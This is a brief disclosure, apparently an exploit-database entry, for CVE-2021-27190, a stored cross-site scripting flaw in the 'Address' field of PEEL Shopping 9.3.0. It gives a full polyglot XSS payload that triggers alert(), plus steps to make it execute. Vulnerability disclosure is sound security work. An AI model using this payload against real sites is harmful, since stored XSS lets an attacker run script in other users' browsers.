CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'
2021-02-11
Anmol K Sachan
https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/
https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing
PEEL SHOPPING 9.3.0
Stored Cross-site Scripting
Stored XSS
CVE-2021-27190
This application is vulnerable to Stored XSS vulnerability.
http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## Vulnerable parameters
'Address'
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
In the same page where we injected payload click on the text box to edit the address.
You will see your Javascript code (XSS) executed.
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
- https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/49553
- https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
- https://cxsecurity.com/issue/WLB-2021020054
- https://nvd.nist.gov/vuln/detail/CVE-2021-27190